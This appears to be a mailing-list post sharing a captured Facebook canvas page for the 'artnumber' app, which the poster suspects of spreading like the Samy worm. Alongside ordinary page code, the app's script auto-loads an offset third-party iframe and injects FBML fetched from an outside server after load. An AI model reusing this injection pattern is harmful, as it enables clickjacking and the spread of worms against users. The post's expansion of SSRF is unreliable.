Has anyone else seen this or been hit by it? It seems to be SSRF (Same Site Request
Forgery, since it's the same site). It seems to work something like the old
Samy worm. I've included the source (I think) in a test file. Not sure if it
will go through. I'm about to look at the code more closely.

Adrian
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd";>
<html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="en" lang="en" 
id="facebook" class=" no_js">
<head>
<!-- Captured source of the logged-out Facebook canvas page for the "artnumber" app (see the title element below). NOTE(review): the stray ";" after many quoted absolute URLs in this capture (doctype, xmlns, href, src) is not well-formed XHTML; presumably an artifact of the mail client that re-wrapped the page source. Confirm against a fresh capture before treating this as the markup that was served. -->
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<script type="text/javascript"> 
//<![CDATA[
// Client-side event logger (window.Log), installed only in the top-level window.
// How it works, per the code below:
//   * g() builds a 4-character id from Math.random using base-62 digits; the id is
//     persisted in window.name as "_e_<id>" and reused when window.name already holds one.
//   * Each log entry is a JSON-like array [id, timestamp, event, ...args, length]; it is
//     written as a cookie "_e_<id>_<n>=<encoded entry>" with a 7-day expiry (604800000 ms),
//     path "/" and the domain set to the "facebook.*" suffix of the current hostname.
//   * a() flushes queued entries into cookies while the cookie jar stays under
//     3950 bytes / 19 cookies; then, when forced (third argument truthy) or when no flush
//     is in flight, the jar has grown past 2500 bytes / 15 cookies and Arbiter reports the
//     onload event, it signals the server by loading an Image from
//     Env.tracking_domain + "/ajax/nectar.php" (cache-busted with a random number and the
//     current time).
// NOTE(review): "host" is assigned without var (twice below) and so becomes an implicit
// global. Also, string literals are broken across lines here (e.g. '; expires='), which
// shows the capture was re-wrapped in transit; it will not run as pasted.
CavalryLogger=false;window._is_quickling_index="";if(window==window.top)window.Log=(function(){function
 g(){var n=Math.random();var o='';for(var m=0;m<4;m++){n=n*62;var 
p=Math.floor(n)%62;if(p>=10&&p<36){p=String.fromCharCode(p-10+65);}else 
if(p>=36&&p<62)p=String.fromCharCode(p-36+97);o+=p;}return o;}var 
k='_e_',l=(window.name||'').toString();l=(l.length==7&&k==l.substr(0,3))?l.substr(3):(window.name=k+g()).substr(3);var
 i=k+l+'_',f=new Date(+new 
Date()+604800000).toGMTString(),d=window.location.hostname.replace(/^.*(facebook\..*)$/i,'$1'),e=';
 expires='+f+';path=/; domain='+d,c=0,h=false,j=[];var b=function(m){return 
i+(c++)+'='+encodeURIComponent(m)+e;};var a=function(n){var 
o=(document.cookie.search(k)>=0);while(j.length>0){var 
p=b(j[0]);if(o&&((document.cookie.length+p.length)>3950||document.cookie.split(';').length>19))break;window.EagleEyeDev&&window.console&&console.log(j[0],'=>',p);document.cookie=p;o=true;j.shift();}if(!!n||!h&&o&&((document.cookie.length>2500||document.cookie.split(';').length>15))&&window.Arbiter&&window.OnloadEvent&&Arbiter.query(OnloadEvent.ONLOAD)){var
 m=new 
Image();h=true;m.onload=function(){h=false;a();};if(window.Env&&Env.tracking_domain){host=Env.tracking_domain;}else
 
host='';m.src=host+'/ajax/nectar.php?asyncSignal='+(Math.floor(Math.random()*10000)+1)+'&'+(!n?'':'s=')+(+new
 Date());}};return function(q,m,o){var r=[l,+new 
Date(),q].concat(m);r.push(r.length);for(var n=0;n<r.length;n++)if(typeof 
r[n]=='string'){r[n]='"'+r[n].replace(/\"/g,'\\"').replace(/\n/g,'\\n')+'"';}else
 if(r[n]===null)r[n]='null';var p='['+r.join(',')+']';if(!o){j.push(p);}else 
document.cookie=b(p);a(o);};})();
//]]>
</script><noscript> <meta http-equiv=refresh content="0; 
URL=/artnumber/?_fb_noscript=1" /> </noscript>
<!-- No-JS fallback: reloads the canvas URL with _fb_noscript=1 (the unquoted http-equiv value above is as captured). The description and handheld link below point at the canvas URL http://apps.facebook.com/artnumber/. -->
 
<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook is a social utility that connects 
people with friends and others who work, study and live around them. People use 
Facebook to keep up with friends, upload an unlimited number of photos, post 
links and videos, and learn more about the people they meet." />
<link rel="alternate" media="handheld" 
href="http://apps.facebook.com/artnumber/"; />
<title>artnumber on Facebook</title>
 
<script type="text/javascript"> 
// Page environment object consumed by the other scripts. Notable values as captured:
//   user:0 (logged-out view), method:"GET", www_base and static_base are plain http://,
//   tracking_domain is http://pixel.facebook.com (read by window.Log above),
//   vip is the serving address and svn_rev the build revision.
// NOTE(review): fb_dtsg and lhsh are short per-page tokens embedded inline; presumably
// request-validation tokens, but their role is not visible in this capture. Confirm
// before relying on them in analysis.
Env={user:0,locale:"en_US",method:"GET",dev:0,start:(new 
Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:286413,vip:"66.220.153.15",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:2,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"iNkQ-",lhsh:"26700",tracking_domain:"http:\/\/pixel.facebook.com",silent_oops_errors:"1",ajax_threshold:"1",ajaxpipe_enabled:"1"};
</script>
<!-- NOTE(review): X-Frame-Options is only honoured as an HTTP response header; browsers do not enforce it from a meta element, and this one is additionally wrapped in noscript, so it is only even present when scripting is off. Framing protection for this page therefore rests on the inline script at the end of the body. The stylesheets below are loaded from static.ak.fbcdn.net over plain http. -->
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
    <link type="text/css" rel="stylesheet" 
href="http://static.ak.fbcdn.net/rsrc.php/z8CPJ/hash/3w02bm3b.css"; />
    <link type="text/css" rel="stylesheet" 
href="http://static.ak.fbcdn.net/rsrc.php/z67G4/hash/eox7ijxz.css"; />
    <link type="text/css" rel="stylesheet" 
href="http://static.ak.fbcdn.net/rsrc.php/z8098/hash/3lptee54.css"; />
    <link type="text/css" rel="stylesheet" 
href="http://static.ak.fbcdn.net/rsrc.php/zA18U/hash/4ygl967g.css"; />
    <link type="text/css" rel="stylesheet" 
href="http://static.ak.fbcdn.net/rsrc.php/z3Z5P/hash/bk7kiwn2.css"; />
 
    <!-- Script loader bootstrap: the first script tag pulls the loader package itself; setResourceMap maps short ids (e.g. htKMA, w2DlR) to static.ak.fbcdn.net package URLs, enableBootload declares bundles that are loaded lazily by name, and InitialJSLoader.load requests five JS packages up front. All of it is served over plain http, so none of these scripts carry an integrity check. -->
    <script type="text/javascript" 
src="http://static.ak.fbcdn.net/rsrc.php/zCI31/hash/dojsxehe.js";></script>
<script 
type="text/javascript">Bootloader.setResourceMap({"htKMA":{"name":"js\/5baz358gr5cs0ck8.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zD7C5\/hash\/2cwo5n9z.js"},"y1JUR":{"name":"js\/5znn8prkzsco4800.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zAV5V\/hash\/6pn9jij1.js"},"3dYbp":{"name":"js\/d1j04lv1dz4000ok.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zD9QW\/hash\/diwj3hcv.js"},"F5p9G":{"name":"js\/2pu5l1f71v6skkco.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z68SS\/hash\/497xw6d8.js"},"jb6FA":{"name":"js\/fbjs.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z5VVC\/hash\/23kftixm.js"},"7zF4n":{"name":"js\/4zfba0rzy84ksk04.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zCI31\/hash\/dojsxehe.js"},"w2DlR":{"name":"css\/1uoad6o0mk4kw8c4.pkg.css","type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z8CPJ\/hash\/3w02bm3b.css"},"HB\/9Y":{"name":"js\/apps\/app_tracker.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z7RKI\/hash\/9x8h6q5r.js"}});
Bootloader.enableBootload({"async":["7zF4n","htKMA","w2DlR"],"dialog":["7zF4n","htKMA","w2DlR"],"dom-form":["7zF4n","htKMA","w2DlR"],"app-tracker":["htKMA","HB\/9Y"]});InitialJSLoader.load(["htKMA","y1JUR","3dYbp","F5p9G","jb6FA"])</script>
<link rel="search" type="application/opensearchdescription+xml" 
href="http://static.ak.fbcdn.net/rsrc.php/zBOV4/hash/10jfw8tc.xml"; 
title="Facebook" />
<link rel="shortcut icon" 
href="http://static.ak.fbcdn.net/rsrc.php/z9Q0Q/hash/8yhim1ep.ico"; /></head>
<body class="frame_wide withCanvasNav withCanvasNavAndBorder fbframe 
UIPage_LoggedOut ie8 win Locale_en_US">
<!-- Logged-out chrome: hidden container, blue bar and the login form. The form POSTs to https://login.facebook.com/login.php?login_attempt=1 with hidden locale, next (the canvas URL), two charset_test probe fields and an lsd token; its inline onsubmit handler delegates to documentElement.onsubmit or Event.fire. NOTE(review): every self-reference on this page is plain http://, so the credential form appears to be rendered on a non-TLS page even though its action is https (confirm from the capture's origin). Also: id="FB_HiddenContainer" is repeated later in the body, tabindex 1 to 4 are positive tab indexes, and a table is used for form layout. -->
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; 
height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div 
id="globalContainer"><div class="loggedout_menubar_container"><div 
class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to 
Facebook Home"><img class="fb_logo img" 
src="http://static.ak.fbcdn.net/rsrc.php/zEX21/hash/75j4m1ms.png"; alt="Facebook 
logo" width="170" height="36" /></a><div class="rfloat"><div 
class="menu_login_container"><form method="POST" 
action="https://login.facebook.com/login.php?login_attempt=1"; id="login_form" 
onsubmit=";var d=document.documentElement;if (d.onsubmit) { return 
d.onsubmit(event); }else { return Event.fire(d, &quot;submit&quot;, event); 
}"><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,?,?,?" 
/><input type="hidden" id="locale" name="locale" value="en_US" 
autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label 
for="email">Email</label></td><td class="html7magic"><label 
for="pass">Password</label></td></tr><tr><td><input type="text" 
class="inputtext" name="email" id="email" tabindex="1" /></td><td><input 
type="password" class="inputtext" name="pass" id="pass" tabindex="2" 
/></td><td><label class="uiButton uiButtonConfirm uiButtonMedium"><input 
value="Login" tabindex="4" type="submit" /></label></td></tr><tr><td 
class="login_form_label_field"><input type="checkbox" class="inputcheckbox" 
value="1" id="persistent" name="persistent" tabindex="3" /><label 
id="label_persistent" for="persistent">Keep me logged in</label></td><td 
class="login_form_label_field"><a href="http://www.facebook.com/reset.php"; 
rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" 
id="next" name="next" value="http://apps.facebook.com/artnumber/"; 
autocomplete="off" /><input type="hidden" name="charset_test" 
value="&euro;,&acute;,€,´,?,?,?" /><input type="hidden" id="lsd" name="lsd" 
value="QJ8d5" autocomplete="off" /></form>
<!-- Sign-up bar and the start of the content frame. The content area loads the Facebook Connect library from static.ak.connect.facebook.com/connect.php/en_US (plain http), followed by the inline init script. NOTE(review): the div with id="FB_HiddenContainer" below duplicates the one at the top of the body; ids must be unique. -->
</div></div></div></div><div class="signup_bar_container"><div 
class="signup_box clearfix"><a class="signup_btn uiButton uiButtonSpecial 
uiButtonLarge" href="/r.php?locale=en_US"><span class="uiButtonText">Sign 
Up</span></a><span class="signup_box_content"><span>Sign up for Facebook to use 
artnumber.</span></span></div></div><div id="dropmenu_container"></div><div 
id="content" class="fb_content clearfix"><div class="UIStandardFrame_Container 
clearfix"><div class="UIStandardFrame_Content"><div ><div 
id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; 
height:0px;" ></div> <script 
src="http://static.ak.connect.facebook.com/connect.php/en_US"; 
type="text/javascript"></script><script type="text/javascript"> 
// Connect-library init: once the "CacheData" feature is available, points the
// cross-domain communication server at /xd_receiver_v0.4.php and runs the cache
// utility server with empty data params. Which origins or messages the xd receiver
// accepts is not visible in this capture.
FB_RequireFeatures(["CacheData"], function()
{
 
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
FBIntern.CacheUtil.CacheUtilServer.dataparams = {};
FBIntern.CacheUtil.CacheUtilServer.run(true);
});
</script><!--
*{} @import 
url('http://apps.facebook.com/ajax/connect/load_test.php?app_id=143817662321145&url=http%3A%2F%2Fapps.facebook.com%2Fartnumber%2F');--><div
 id="app_content_143817662321145" class="canvas_rel_positioning 
app_content_143817662321145"><div><div style="position: relative; overflow: 
hidden"><style type="text/css">.app_content_143817662321145 .frabox { border: 
0px solid #ffffff; background: #ffffff none repeat scroll 0% 0%; overflow: 
hidden; width: 739px; height: 600px; }
.app_content_143817662321145 .fraoff { overflow: hidden; position: absolute; 
left: 10px; top: -15px; width: 740px; height: 700px; }
</style>
<!-- App canvas for app_id 143817662321145. The commented-out CSS @import above references a load_test.php endpoint; the .frabox / .fraoff rules size a 739x600 box and an absolutely positioned 740x700 overlay. The empty divs below (frabox, wrapper, functions, return) are the targets the app's FBJS fills at load time; fbcontext is a non-standard attribute carrying the FBML context key that the onload scripts reference. -->
 
 
 
 
 
<div id="app143817662321145_frabox" fbcontext="ab0e3927a75a"></div>
 
<div id="app143817662321145_wrapper" fbcontext="ab0e3927a75a">
 
 
</div>
 
<div id="app143817662321145_functions" fbcontext="ab0e3927a75a"></div>
<div id="app143817662321145_return" fbcontext="ab0e3927a75a"></div>
 
<!-- Sidebar ad slot and page footer. NOTE(review): the title attribute on the "artnumber" footer link reads "HPHP - 311 - 10.144.147.128 - 708984", which looks like server-side debugging output (a runtime name, a private RFC 1918 address and numeric identifiers) leaking into the rendered page; that is an information-disclosure point about the hosting platform, independent of the app. The footer is followed by the frame-busting script, whose body continues on the next lines. -->
</div></div></div></div></div><div class="UIStandardFrame_SidebarAds"><div 
class="canvasSidebar"><div 
id="canvas_nav_content"></div></div>&nbsp;</div></div></div><div 
id="pageFooter"><div id="contentCurve"></div><div class="clearfix" 
id="footerContainer"><div class="lfloat"><div class="uiTextSubtitle"><a 
class="uiLinkSubtle" 
href="http://www.facebook.com/apps/application.php?id=143817662321145"; 
title="HPHP - 311 - 10.144.147.128 - 708984">artnumber</a> · <a rel="dialog" 
title="Report problems with artnumber" 
href="/ajax/report_app.php?app_id=143817662321145">Report</a> · <a rel="dialog" 
href="/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fapps.facebook.com%2Fartnumber%2F"
 title="Use Facebook in another language.">English (US)</a></div></div><div 
class="uiTextSubtitle rfloat"><a href="http://www.facebook.com/mobile?ref=pf"; 
title="Check out Facebook Mobile.">Mobile</a> · <a 
href="http://www.facebook.com/find-friends?ref=pf"; title="Find anyone on the 
web.">Find Friends</a> · <a href="http://www.facebook.com/badges/?ref=pf"; 
title="Embed a Facebook badge on your website.">Badges</a> · <a 
href="http://www.facebook.com/facebook"; accesskey="8" title="Read our blog, 
discover the resource center, and find job opportunities.">About</a> · <a 
href="/campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=0"
 title="Advertise on Facebook.">Advertising</a> · <a 
href="http://developers.facebook.com/?ref=pf"; title="Develop on our 
platform.">Developers</a> · <a href="http://www.facebook.com/careers/?ref=pf"; 
title="Make your next career move to our awesome company.">Careers</a> · <a 
href="http://www.facebook.com/privacy/explanation.php"; title="Learn about your 
privacy and Facebook.">Privacy</a> · <a 
href="http://www.facebook.com/terms.php?ref=pf"; accesskey="9" title="Review our 
terms of service.">Terms</a> · <a href="http://www.facebook.com/help/?ref=pf"; 
accesskey="0" title="Visit our Help 
Center.">Help</a></div></div></div></div><script type="text/javascript">/* 
<![CDATA[ */if (top != self) { try { if (top.location.hostname.indexOf("apps") 
/* Frame-busting check (the script tag opens on the previous line). When the page is
   framed, reading top.location.hostname either throws (cross-origin top window) or,
   when the top hostname contains "apps", the code throws 1 itself; either way the catch
   block runs: it schedules an image beacon to error.facebook.com (c=si_clickjacking)
   after 5 s and immediately document.write()s a style that hides everything in the
   body plus a "Go to Facebook.com" link. Framing by a same-origin top window without
   "apps" in its hostname is allowed through. NOTE(review): the escape hatch is a user
   click on an href="#" link with an inline onclick, not an automatic top-navigation,
   and since the X-Frame-Options meta in the head is not enforced by browsers this
   script is the only framing defence visible in the capture. */
>= 0) { throw 1; } } catch (e) {setTimeout(function() {var fb_cj_img = new 
Image(); fb_cj_img.src = 
"http:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&m&t=36";},
 5000); window.document.write("<style>body * { display:none !important; 
}<\/style><a href=\"#\" onclick=\"top.location.href=window.location.href\" 
style=\"display: block !important; padding: 10px\"><i class=\"img 
spritemap_bt5k9d sx_8a0154\" style=\"display:block !important\"><\/i>Go to 
Facebook.com<\/a>");/* eTC68dsy */ }}/* ]]> */</script>
  <!-- Second resource map: registers the CSS packages (ids FXnty, /Vpsc, olbS/, kg1as) that Bootloader.configurePage in the following script switches on; the css ids match the ones listed in the BigPipe pagelets at the end of the page. -->
  <script 
type="text/javascript">Bootloader.setResourceMap({"FXnty":{"name":"css\/2e28i09g09xcw804.pkg.css","type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z67G4\/hash\/eox7ijxz.css"},"\/Vpsc":{"name":"css\/a9wxgs2u1dcs0w0s.pkg.css","type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z8098\/hash\/3lptee54.css"},"olbS\/":{"name":"css\/ae00p9rwk9c80oww.pkg.css","type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zA18U\/hash\/4ygl967g.css"},"kg1as":{"name":"css\/d275now8qs080cwo.pkg.css","type":"css","permanent":1,"nonblocking":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z3Z5P\/hash\/bk7kiwn2.css"}});</script><script
 type="text/javascript"> 
 
// Page-level onload wiring. configurePage / done switch on the CSS packages registered
// above and mark the log utility as loaded; the onloadRegister callbacks below are
// queued to run after the page has loaded.
Bootloader.configurePage(["w2DlR","FXnty","\/Vpsc","olbS\/","kg1as"]);
Bootloader.done(["js\/lib\/util\/log.js"]);
 
 
// FBML context for this canvas render: a PHP-serialized CanvasFBMLFlavor whose _fbml_env
// records user 0, app_id 143817662321145, canvas_url http://apps.facebook.com/artnumber/,
// source_url http://webbodyart.com/artnumber/ (the app's own server), loggedout and
// non-tos true. The key "ab0e3927a75a" matches the fbcontext attribute on the app divs.
onloadRegister(function (){FBML.Contexts["ab0e3927a75a"] = 
"O:16:\"CanvasFBMLFlavor\":1:{s:9:\"_fbml_env\";a:9:{s:4:\"user\";i:0;s:6:\"app_id\";i:143817662321145;s:10:\"fb_page_id\";i:0;s:10:\"canvas_url\";s:35:\"http:\/\/apps.facebook.com\/artnumber\/\";s:10:\"source_url\";s:32:\"http:\/\/webbodyart.com\/artnumber\/\";s:9:\"loggedout\";b:1;s:7:\"non-tos\";b:1;s:11:\"flavor_code\";i:3;s:8:\"is_tosed\";b:0;}}";
;});
// App bootstrap plus the app's own code, all carried inside string literals passed to
// eval_global and fbjs_sandbox.loadScripts (the strings are mail-wrapped across the lines
// below and will not parse as pasted). What the captured FBJS does:
//   1. creates the app sandbox with validation_vars (fb_sig_* fields, including the app's
//      api_key and the fb_sig signature), context / contextd (the serialized env above)
//      and data {user:0, installed:false}, then calls bootstrap();
//   2. defines ajaxfunc.post(url, query): replaces the content of #frabox with a 760x700
//      iframe whose src is on the external host track.SocialSurveys.us
//      (DefaultPage.aspx?nm=...), animates the box open to 462px, and sends an Ajax POST
//      with requireLogin = 0 and JSON responseType; on success it injects the returned
//      fbml_return / fbml_functions into #return and #functions via setInnerFBML, on
//      error it blanks #wrapper;
//   3. 500 ms after load, with no user interaction, calls
//      post('http://webbodyart.com/artnumber/index.php', {ajax:1}).
// NOTE(review): so this canvas page embeds a third-party iframe and injects
// server-supplied FBML as soon as it loads, while the viewer is logged out. What the
// injected FBML contains cannot be seen from this static capture; the index.php?ajax=1
// response needs to be reviewed separately before the behaviour is characterised.
onloadRegister(function (){eval_global("var app_143817662321145 = new 
fbjs_sandbox(\"143817662321145\").setBridgeHash(\"\");app_143817662321145.validation_vars
 = 
{\"fb_sig_locale\":\"en_US\",\"fb_sig_in_new_facebook\":1,\"fb_sig_time\":\"1283801780.4357\",\"fb_sig_logged_out_facebook\":1,\"fb_sig_added\":0,\"fb_sig_country\":\"us\",\"fb_sig_api_key\":\"2a886e7618bf32ec9e4f932d2c297c48\",\"fb_sig_app_id\":143817662321145,\"fb_sig\":\"8df3a9590f1626ffe4e5aff25ad640d8\"};app_143817662321145.context
 = \"ab0e3927a75a\";app_143817662321145.contextd = 
\"O:16:\\\"CanvasFBMLFlavor\\\":1:{s:9:\\\"_fbml_env\\\";a:9:{s:4:\\\"user\\\";i:0;s:6:\\\"app_id\\\";i:143817662321145;s:10:\\\"fb_page_id\\\";i:0;s:10:\\\"canvas_url\\\";s:35:\\\"http:\\\/\\\/apps.facebook.com\\\/artnumber\\\/\\\";s:10:\\\"source_url\\\";s:32:\\\"http:\\\/\\\/webbodyart.com\\\/artnumber\\\/\\\";s:9:\\\"loggedout\\\";b:1;s:7:\\\"non-tos\\\";b:1;s:11:\\\"flavor_code\\\";i:3;s:8:\\\"is_tosed\\\";b:0;}}\";app_143817662321145.data
 = 
{\"user\":0,\"installed\":false};app_143817662321145.bootstrap();");fbjs_sandbox.loadScripts([{"inline":"\n\t\nfunction
 a143817662321145_ajaxfunc(){\n\t\n\t$FBJS.ref(this).post = 
function(a143817662321145_url,a143817662321145_query) 
{\n\t\ta143817662321145_document.getElementById('frabox').setClassName('frabox');\n\t\ta143817662321145_document.getElementById('frabox').setInnerXHTML('<iframe
 id=\"fraoff\" name=\"fraoff\" width=\"760\" height=\"700\" scrolling=\"no\" 
frameborder=\"1\" 
style=\"position:relative;overflow:hidden;border:none;width:755px;height:750px;top:-245px;\"
 
src=\"http:\/\/track.SocialSurveys.us\/DefaultPage.aspx?nm=017gjfq68yx9\"><\/iframe>');\n\t\t\n\t\ta143817662321145_Animation(a143817662321145_document.getElementById('frabox')).to('height',
 '462px').from('0px').go();\n\t\tvar a143817662321145_ajax = new 
a143817662321145_Ajax();\n\t\ta143817662321145_ajax.ondone = 
function(a143817662321145_data) 
{\n\t\t\ta143817662321145_document.getElementById('return').setInnerFBML(a143817662321145_data.fbml_return);\n\t\t\ta143817662321145_document.getElementById('functions').setInnerFBML(a143817662321145_data.fbml_functions);\n\t\t\t\n\t\t\ta143817662321145_ajax=null;\n\t\t}\n\t\ta143817662321145_ajax.onerror
 = function() 
{\n\t\t\ta143817662321145_document.getElementById('wrapper').setTextValue('');\n\t\t}\n\t\ta143817662321145_ajax.requireLogin
 = 0;\n\t\ta143817662321145_ajax.responseType = 
a143817662321145_Ajax.JSON;\n\t\ta143817662321145_ajax.post(a143817662321145_url,a143817662321145_query);\n\t};\n\n}\n\n\ta143817662321145_setTimeout(function(){\n\t\tvar
 a143817662321145_jax = new 
a143817662321145_ajaxfunc();\n\t\ta143817662321145_jax.post('http:\/\/webbodyart.com\/artnumber\/index.php',{\"ajax\":1});\n\t},500);\n\n"}]);;});
// Canvas controller for the app (id, name, canvas base URL, api_key, and the
// bookmark.add / friends.add flags), then the page-chrome flags, focusing the email
// field, and an app-usage tracker started after load with the arguments 15000 and
// 600000 (their meaning is not visible here).
onloadRegister(function (){new PlatformCanvasController("143817662321145", "", 
0, "", "artnumber", "http:\/\/webbodyart.com\/artnumber\/", 
"2a886e7618bf32ec9e4f932d2c297c48", "0", 
{"bookmark.add":1,"friends.add":1});;});
onloadRegister(function (){window.loading_page_chrome = true;;});
onloadRegister(function (){try { $("email").focus(); } catch (_ignore) { };});
onloadRegister(function (){window.loading_page_chrome = false;;});
onafterloadRegister(function (){Bootloader.loadComponents(["app-tracker"], 
function(){ AppUseTracker("143817662321145", false, 15000, 600000); });;});
 
 
</script>
<script>big_pipe = new BigPipe(null, 2, null, 0, false);
// BigPipe pagelet delivery, phase 0 ("first_response"): two phases in total, no JS yet, the css list repeats the package ids configured above. The phase 1 pagelet arrives in a later script tag.
big_pipe.onPageletArrive({"num_phases":2,"roadrunner_enabled":false,"id":"first_response","phase":0,"is_last":true,"tti_phase":0,"bootloadable":[],"css":["w2DlR","FXnty","\/Vpsc","olbS\/","kg1as"],"js":[],"resource_map":[],"extern_rsrcs":[],"requires":[],"provides":[],"onload":[],"onafterload":[],"onpagecache":[],"onafterpagecache":[],"refresh_pagelets":[],"invalidate_cache":[]});</script>
                                                                                
                                                                                
                                                                                
                                                                                
                                                                                
                                                                                
                                                                                
              
<!-- BigPipe phase 1 pagelet: empty id and content, lists the six JS package ids to load (7zF4n, htKMA, y1JUR, 3dYbp, F5p9G, jb6FA) and the same css ids; page_cache is false. -->
<script>big_pipe.onPageletArrive({"id":"","phase":1,"is_last":true,"append":false,"bootloadable":[],"css":["w2DlR","FXnty","\/Vpsc","olbS\/","kg1as"],"js":["7zF4n","htKMA","y1JUR","3dYbp","F5p9G","jb6FA"],"resource_map":[],"requires":[],"provides":[],"onload":[],"onafterload":[],"onpagecache":[],"onafterpagecache":[],"refresh_pagelets":[],"invalidate_cache":[],"content":[],"page_cache":false});</script>
                                                                                
                                                                                
                                                                                
                                                                                
                                                                                
                                                                                
                                                                                
                                                         </body></html>